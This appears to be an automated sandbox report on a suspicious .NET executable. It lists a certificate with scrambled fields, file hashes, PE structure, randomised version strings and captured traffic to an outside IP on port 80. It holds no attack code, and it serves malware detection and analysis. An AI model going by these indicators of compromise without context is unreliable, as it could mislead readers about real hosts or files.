OU=&#239;&#131;&#149;&#239;&#131;&#145;&#239;&#130;&#168;&#239;&#131;&#157;&#239;&#131;&#144;&#239;&#130;&#171;&#239;&#131;&#140;&#239;&#131;&#157;&#239;&#131;&#141;&#239;&#130;&#170;&#239;&#130;&#168;&#239;&#130;&#172;&#239;&#131;&#158;&#239;&#131;&#139;&#239;&#131;&#154;&#239;&#130;&#174;&#239;&#130;&#168;&#239;&#131;&#135;&#239;&#130;&#184;&#239;&#130;&#182;&#239;&#130;&#166;&#239;&#130;&#175;&#239;&#131;&#137;, O=&#231;&#158;&#161;&#231;&#158;&#160;&#231;&#158;&#151;&#231;&#158;&#146;&#231;&#158;&#131;&#231;&#158;&#167;&#231;&#157;&#176;&#231;&#157;&#188;&#231;&#158;&#150;&#231;&#158;&#128;&#231;&#157;&#188;&#231;&#157;&#189;&#231;&#157;&#186;&#231;&#158;&#130;&#231;&#158;&#134;&#231;&#158;&#154;&#231;&#158;&#129;&#231;&#158;&#155;&#231;&#158;&#144;&#231;&#158;&#156;&#231;&#158;&#150;&#231;&#158;&#130;&#231;&#158;&#155;&#231;&#157;&#189;&#231;&#158;&#164;&#231;&#158;&#160;&#231;&#158;&#165;&#231;&#157;&#184;&#231;&#158;&#133;&#231;&#157;&#181;&#231;&#158;&#151;&#231;&#157;&#184;&#231;&#158;&#128;&#231;&#158;&#147;&#231;&#158;&#167;&#231;&#157;&#188;&#231;&#158;&#164;&#231;&#157;&#183;&#231;&#158;&#166;&#231;&#158;&#157;&#231;&#157;&#175;&#231;&#157;&#183;, CN=&#236;&#164;&#154;&#236;&#164;&#140;&#236;&#164;&#165;&#236;&#164;&#157;&#236;&#164;&#152;&#236;&#163;&#183;&#236;&#164;&#165;&#236;&#164;&#164;&#236;&#164;&#167;&#236;&#163;&#186;&#236;&#164;&#131;
                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                      Error Number:-2146762487
                                                                      Not Before, Not After
                                                                      • 2/22/2021 9:12:55 PM 2/22/2022 9:12:55 PM
                                                                      Subject Chain
                                                                      • C=?????????????????????????????????????, S=&#233;&#134;&#138;&#233;&#133;&#151;&#233;&#133;&#165;&#233;&#133;&#191;&#233;&#133;&#169;&#233;&#134;&#143;&#233;&#133;&#185;&#233;&#133;&#157;&#233;&#134;&#143;&#233;&#134;&#136;&#233;&#134;&#142;&#233;&#134;&#132;&#233;&#133;&#187;&#233;&#134;&#141;&#233;&#133;&#160;&#233;&#133;&#153;&#233;&#133;&#173;&#233;&#133;&#160;&#233;&#134;&#131;&#233;&#133;&#152;&#233;&#134;&#136;&#233;&#133;&#176;&#233;&#133;&#153;&#233;&#134;&#131;&#233;&#134;&#133;&#233;&#134;&#143;&#233;&#133;&#173;&#233;&#133;&#169;&#233;&#133;&#158;&#233;&#133;&#176;&#233;&#133;&#191;&#233;&#133;&#176;&#233;&#133;&#159;&#233;&#134;&#141;&#233;&#133;&#171;&#233;&#133;&#151;&#233;&#133;&#188;&#233;&#133;&#151;&#233;&#134;&#138;&#233;&#133;&#163;&#233;&#133;&#151;&#233;&#133;&#153;&#233;&#133;&#166;&#233;&#134;&#137;&#233;&#133;&#151;, L=&#226;&#162;&#169;&#226;&#162;&#168;&#226;&#163;&#142;&#226;&#163;&#136;&#226;&#163;&#134;&#226;&#163;&#139;&#226;&#162;&#171;&#226;&#162;&#168;&#226;&#163;&#128;&#226;&#162;&#186;&#226;&#163;&#128;&#226;&#162;&#168;&#226;&#162;&#167;&#226;&#162;&#160;&#226;&#162;&#168;&#226;&#162;&#166;&#226;&#162;&#178;&#226;&#163;&#137;&#226;&#162;&#159;&#226;&#162;&#177;&#226;&#162;&#158;, T=&#233;&#178;&#134;&#233;&#178;&#143;&#233;&#177;&#183;&#233;&#177;&#159;&#233;&#177;&#184;&#233;&#177;&#183;&#233;&#177;&#172;&#233;&#178;&#131;&#233;&#177;&#159;&#233;&#177;&#168;&#233;&#177;&#173;&#233;&#177;&#156;&#233;&#177;&#189;, E=??????????????????, OU=&#239;&#131;&#149;&#239;&#131;&#145;&#239;&#130;&#168;&#239;&#131;&#157;&#239;&#131;&#144;&#239;&#130;&#171;&#239;&#131;&#140;&#239;&#131;&#157;&#239;&#131;&#141;&#239;&#130;&#170;&#239;&#130;&#168;&#239;&#130;&#172;&#239;&#131;&#158;&#239;&#131;&#139;&#239;&#131;&#154;&#239;&#130;&#174;&#239;&#130;&#168;&#239;&#131;&#135;&#239;&#130;&#184;&#239;&#130;&#182;&#239;&#130;&#166;&#239;&#130;&#175;&#239;&#131;&#137;, O=&#231;&#158;&#161;&#231;&#158;&#160;&#231;&#158;&#151;&#231;&#158;&#146;&#231;&#158;&#131;&#231;&#158;&#167;&#231;&#157;&#176;&#231;&#157;&#188;&#231;&#158;&#150;&#231;&#158;&#128;&#231;&#157;&#188;&#231;&#157;&#189;&#231;&#157;&#186;&#231;&#158;&#130;&#231;&#158;&#134;&#231;&#158;&#154;&#231;&#158;&#129;&#231;&#158;&#155;&#231;&#158;&#144;&#231;&#158;&#156;&#231;&#158;&#150;&#231;&#158;&#130;&#231;&#158;&#155;&#231;&#157;&#189;&#231;&#158;&#164;&#231;&#158;&#160;&#231;&#158;&#165;&#231;&#157;&#184;&#231;&#158;&#133;&#231;&#157;&#181;&#231;&#158;&#151;&#231;&#157;&#184;&#231;&#158;&#128;&#231;&#158;&#147;&#231;&#158;&#167;&#231;&#157;&#188;&#231;&#158;&#164;&#231;&#157;&#183;&#231;&#158;&#166;&#231;&#158;&#157;&#231;&#157;&#175;&#231;&#157;&#183;, CN=&#236;&#164;&#154;&#236;&#164;&#140;&#236;&#164;&#165;&#236;&#164;&#157;&#236;&#164;&#152;&#236;&#163;&#183;&#236;&#164;&#165;&#236;&#164;&#164;&#236;&#164;&#167;&#236;&#163;&#186;&#236;&#164;&#131;
                                                                      Version:3
                                                                      Thumbprint MD5:56752C5E6978D4ABE3C7D65E31C00021
                                                                      Thumbprint SHA-1:F392AB811E10AE91CC65022C593454FDFB09EAD6
                                                                      Thumbprint SHA-256:CA3A078248B2626070BED6C4B47B5251927A70139FDDFD5CE13FD49FC5AC0E0B
                                                                      Serial:00B36E5B0262998521DE86E1070DCFF941

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x99c7c0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x3e0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x986000x1840
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x97cd40x97e00False0.350467785494data4.27322887821IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x9a0000x3e00x400False0.4658203125data3.55939604933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x9c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_VERSION0x9a0580x388dataEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      LegalCopyrightCopyright 2022 MOzFSskd. All rights reserved.
                                                                      Assembly Version5.6.5.8
                                                                      InternalNameToNTDGRS.exe
                                                                      FileVersion2.6.2.8
                                                                      CompanyNameSrsVNMNX
                                                                      LegalTrademarksKOvJHlAj
                                                                      CommentsJPDqIdWm
                                                                      ProductNameToNTDGRS
                                                                      ProductVersion5.6.5.8
                                                                      FileDescriptionMoaiNZXC
                                                                      OriginalFilenameToNTDGRS.exe
                                                                      Translation0x0409 0x0514

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 23, 2021 09:28:34.935695887 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:34.997261047 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:34.997452021 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:34.998536110 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.059772015 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436336040 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436388969 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436415911 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436438084 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436460972 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436481953 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436505079 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436523914 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436532974 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.436543941 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436568975 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.436575890 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.436583996 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.436642885 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.437669039 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.437702894 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.437773943 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.439173937 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.439207077 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.439305067 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.440483093 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.440512896 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.440598011 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.441953897 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.441997051 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.442084074 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.443375111 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.443412066 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.443520069 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.444792032 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.444812059 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.444919109 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.445688009 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.445720911 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.445801020 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.447118998 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.447153091 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.447247982 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.448573112 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.448605061 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.448688030 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.450000048 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.450031042 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.450171947 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.497930050 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.497972012 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.498117924 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.498589039 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.498625994 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.498723984 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.500056982 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.500088930 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.500205994 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.501503944 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.501533985 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.501652956 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.503223896 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.503257036 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.503402948 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.504312992 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.504348040 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.504442930 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.505774021 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.505809069 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.505892992 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.507208109 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.507240057 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.507335901 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.508650064 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.508686066 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.508805037 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.510067940 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.510099888 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.510231972 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.511504889 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.512196064 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.512232065 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.512330055 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.513645887 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.513686895 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.513740063 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.515084028 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.515121937 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.515166998 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.516510963 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.516546965 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.516598940 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.517945051 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.517990112 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.518095970 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.519388914 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.519426107 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.519491911 CET4971280192.168.2.6172.67.172.17
                                                                      Feb 23, 2021 09:28:35.520836115 CET8049712172.67.172.17192.168.2.6
                                                                      Feb 23, 2021 09:28:35.520865917 CET8049712172.67.172.17192.168.2.6

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 23, 2021 09:28:23.522687912 CET4928353192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:23.582788944 CET53492838.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:23.798494101 CET5837753192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:23.815150023 CET5507453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:23.861526012 CET53583778.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:23.863817930 CET53550748.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:24.425415039 CET5451353192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:24.474319935 CET53545138.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:25.292565107 CET6204453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:25.341149092 CET53620448.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:27.516746998 CET6379153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:27.580415010 CET53637918.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:34.860300064 CET6426753192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:34.917351961 CET53642678.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:40.006525993 CET4944853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:40.058226109 CET53494488.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:41.314496994 CET6034253192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:41.366187096 CET53603428.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:42.287132978 CET6134653192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:42.335808039 CET53613468.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:43.234739065 CET5177453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:43.284148932 CET53517748.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:44.225542068 CET5602353192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:44.284324884 CET53560238.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:45.242966890 CET5838453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:45.294511080 CET53583848.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:46.463737011 CET6026153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:46.516885996 CET53602618.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:48.360842943 CET5606153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:48.418561935 CET53560618.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:50.352264881 CET5833653192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:50.412390947 CET53583368.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:51.223875999 CET5378153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:51.274481058 CET53537818.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:52.187889099 CET5406453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:52.236635923 CET53540648.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:53.150684118 CET5281153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:53.199383974 CET53528118.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:54.100967884 CET5529953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:54.152616024 CET53552998.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:55.095060110 CET6374553192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:55.144134045 CET53637458.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:55.973992109 CET5005553192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:56.025753975 CET53500558.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:56.922782898 CET6137453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:56.975642920 CET53613748.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:28:57.906821012 CET5033953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:28:57.961092949 CET53503398.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:02.025567055 CET6330753192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:02.074213028 CET53633078.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:19.910368919 CET4969453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:19.962018967 CET53496948.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:21.254525900 CET5498253192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:21.304748058 CET53549828.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:33.892565966 CET5001053192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:33.954066992 CET53500108.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:39.340049028 CET6371853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:39.426882029 CET53637188.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:39.799766064 CET6211653192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:39.858205080 CET53621168.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:40.400765896 CET6381653192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:40.496850014 CET53638168.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:41.143634081 CET5501453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:41.202327013 CET53550148.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:41.623162031 CET6220853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:41.683229923 CET53622088.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:42.417121887 CET5757453192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:42.468945980 CET53575748.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:44.333447933 CET5181853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:44.382369995 CET53518188.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:45.300056934 CET5662853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:45.366123915 CET53566288.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:46.002816916 CET6077853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:46.052968025 CET53607788.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:46.650135994 CET5379953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:46.707310915 CET53537998.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:48.263787031 CET5468353192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:48.323863983 CET53546838.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:48.499550104 CET5932953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:48.558743000 CET53593298.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:49.850974083 CET6402153192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:49.900990963 CET53640218.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:29:51.000889063 CET5612953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:29:51.058813095 CET53561298.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:30:04.448559999 CET5817753192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:30:04.500209093 CET53581778.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:30:05.879398108 CET5070053192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:30:05.940295935 CET53507008.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:30:12.268616915 CET5406953192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:30:12.346003056 CET53540698.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:30:26.611480951 CET6117853192.168.2.68.8.8.8
                                                                      Feb 23, 2021 09:30:26.668598890 CET53611788.8.8.8192.168.2.6
                                                                      Feb 23, 2021 09:30:35.400999069 CET5701753192.168.2.68.8.8.8
